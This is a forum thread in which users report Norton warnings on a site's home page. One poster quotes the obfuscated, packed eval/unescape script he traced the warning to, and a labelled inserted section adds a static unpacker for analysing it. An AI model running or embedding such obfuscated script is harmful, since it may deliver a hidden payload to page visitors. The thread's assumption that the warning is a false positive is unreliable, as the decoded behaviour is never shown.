Security Warnings From Norton Finally Stopped

ronnymundster (Newbie; joined May 4, 2009; messages: 22; reaction score: 7)
This is my first visit to Blackhatworld in a while that wasn't blocked by Norton Internet Security 2010 in some way. Every visit to the home page for the past couple of weeks warned about an HTTP toolkit variant of some kind. Anyway, I am glad whatever was causing the warning has finally stopped.
 
Sorry to resurrect this thread. I am still having this issue and for the last 6 months I have been unable to access the main page of BHW because of the security warnings from Norton Internet Security.

I know Norton is not regarded as the best antivirus around here, but it is all I have, and even though I plan to buy Kaspersky, I have quite a few months left on my Norton subscription. Also, whatever crap Norton is, it is used by quite a lot of people, and having a red warning trigger the first time they visit BHW is surely going to scare them away.

I have visited other vBulletin forums with a CMS portal and this is the only one which triggers that warning.

Anyway, I went through the trouble of saving the main page of BHW on another computer and then removing pieces of the HTML until Norton stopped giving the warning. In the end it came down to this:

Code:
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!\'\'.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return\'\\w+\'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp(\'\\b\'+e(c)+\'\\b\',\'g\'),k[c])}}return p}(\'n(m("%b%l%e%1%j%7%k%i%o%u%p%s%i%7%r%h%2%1%0%0%6%e%2%1%0%0%3%a%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%d%2%1%0%0%3%b%2%1%0%0%3%9%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%5%2%1%0%0%3%6%2%1%0%0%6%b%2%1%0%0%3%f%2%1%0%0%4%c%2%1%0%0%4%c%2%1%0%0%4%0%2%1%0%0%6%g%2%1%0%0%5%8%2%1%0%0%5%8%2%1%0%0%3%4%2%1%0%0%3%8%2%1%0%0%3%8%2%1%0%0%3%4%2%1%0%0%3%e%2%1%0%0%3%9%2%1%0%0%5%b%2%1%0%0%3%d%2%1%0%0%3%7%2%1%0%0%3%d%2%1%0%0%3%e%2%1%0%0%4%a%2%1%0%0%4%g%2%1%0%0%3%9%2%1%0%0%5%7%2%1%0%0%3%6%2%1%0%0%3%8%2%1%0%0%3%b%2%1%0%0%5%8%2%1%0%0%3%6%2%1%0%0%3%8%2%1%0%0%4%9%2%1%0%0%3%7%2%1%0%0%4%c%2%1%0%0%3%9%2%1%0%0%4%5%2%1%0%0%5%8%2%1%0%0%3%a%2%1%0%0%3%7%2%1%0%0%3%c%2%1%0%0%3%9%2%1%0%0%4%f%2%1%0%0%5%7%2%1%0%0%4%0%2%1%0%0%3%f%2%1%0%0%4%0%2%1%0%0%5%0%2%1%0%0%4%4%2%1%0%0%3%a%2%1%0%0%3%c%2%1%0%0%4%c%2%1%0%0%3%f%2%1%0%0%6%b%2%1%0%0%6%d%2%1%0%0%5%0%2%1%0%0%3%f%2%1%0%0%3%9%2%1%0%0%3%a%2%1%0%0%3%4%2%1%0%0%3%f%2%1%0%0%4%c%2%1%0%0%6%b%2%1%0%0%6%d%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%c%2%1%0%0%4%a%2%1%0%0%3%e%2%1%0%0%3%9%2%1%0%0%6%b%2%1%0%0%5%5%2%1%0%0%3%c%2%1%0%0%3%a%2%1%0%0%4%6%2%1%0%0%4%0%2%1%0%0%3%e%2%1%0%0%3%d%2%1%0%0%4%a%2%1%0%0%6%g%2%1%0%0%3%7%2%1%0%0%3%8%2%1%0%0%3%7%2%1%0%0%3%9%2%1%0%0%5%5%2%1%0%0%6%7%2%1%0%0%6%e%2%1%0%0%5%8%2%1%0%0%3%a%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%d%2%1%0%0%3%b%2%1%0%0%3%9%2%1%0%0%6%7%h%q%t"));\',31,31,\'30|75|5C|36|37|32|33|65|66|35|39|64|34|31|63|38|61|27|74|6D|6E|6F|unescape|eval|2E|72|29|28|69|3B|77\'.split(\'|\'),0,{}));
</script>

I have no idea what the above code does but it is present two times: around line 716 and line 894.

I hope the admins see this post and perhaps decide to change the code around to avoid the false positives.
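
An added example, not part of the original post or of the site's code: a static unpacker for the `eval(function(p,a,c,k,e,d)` wrapper seen above, which rebuilds the script's text without executing it so the behaviour a scanner flags can be read. The sample input is constructed, and the function names and the handling of nested `eval(unescape("..."))` and `\uXXXX` layers are this example's assumptions.

```javascript
// Constructed sample (not the script from the post); the wrapper's decoder body is elided.
const SAMPLE = "eval(function(p,a,c,k,e,d){/* decoder elided */}(" +
  "'k(j(\"%4%5%6%1%7%8%9%a%b%c%d%e%a%8%f%g%2%1%0%0%3%6%h%2%1%0%0%3%8%g%i\"))',21,21," +
  "'30|75|5C|33|64|6F|63|6D|65|6E|74|2E|77|72|69|28|27|62|29|unescape|eval'.split('|'),0,{}))";

// Wrapper arguments: ('payload',radix,count,'dictionary'.split('|') with optionally escaped quotes.
const PACKED = /\}\(\\?'(.*?)\\?',(\d+),(\d+),\\?'(.*?)\\?'\.split\(\\?'\|\\?'\)/s;

// Index encoded by one token in base `radix` (digits 0-9, a-z, A-Z); -1 if not a token.
function tokenIndex(tok, radix) {
  let n = 0;
  for (const ch of tok) {
    const code = ch.charCodeAt(0);
    const d = /\d/.test(ch) ? code - 48 : /[a-z]/.test(ch) ? code - 87
            : /[A-Z]/.test(ch) ? code - 29 : -1;
    if (d < 0 || d >= radix) return -1;
    n = n * radix + d;
  }
  return n;
}

// Layer 1: put dictionary words back into the payload, as the wrapper would at run time.
function unpack(source) {
  const m = PACKED.exec(source);
  if (!m) return null;
  const radix = Number(m[2]), words = m[4].split("|");
  return m[1].replace(/\b\w+\b/g, (tok) => {
    const i = tokenIndex(tok, radix);
    return i >= 0 && words[i] ? words[i] : tok;
  });
}

// Layers 2 and 3: %XX inside eval(unescape("...")), then \uXXXX escapes in string literals.
function peel(code) {
  const hex = (_, h) => String.fromCharCode(parseInt(h, 16));
  const m = /^eval\(unescape\("([^"]*)"\)\);?$/.exec(code.trim());
  const inner = m ? m[1].replace(/%([0-9A-Fa-f]{2})/g, hex) : code;
  return inner.replace(/\\u([0-9A-Fa-f]{4})/g, hex);
}

// Describe the script from its text alone; nothing here calls eval.
function analyze(source) {
  const layer1 = unpack(source);
  if (layer1 === null) return { packed: false };
  const decoded = peel(layer1);
  return { packed: true, layer1, decoded, writesMarkup: /document\.write\s*\(/.test(decoded) };
}

console.log(analyze(SAMPLE));
```

Because the decoded text is only ever handled as a string, the same functions can be run over a saved copy of a page's inline scripts on an analysis machine.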
 
Thank you Admins and Mods!! It seems the code was removed and I can once again browse the main page of BHW and stay on top of the latest posts and news!

/cheers

Edit: crap. I spoke too soon. The code is back and once again I can't open the main page :(
 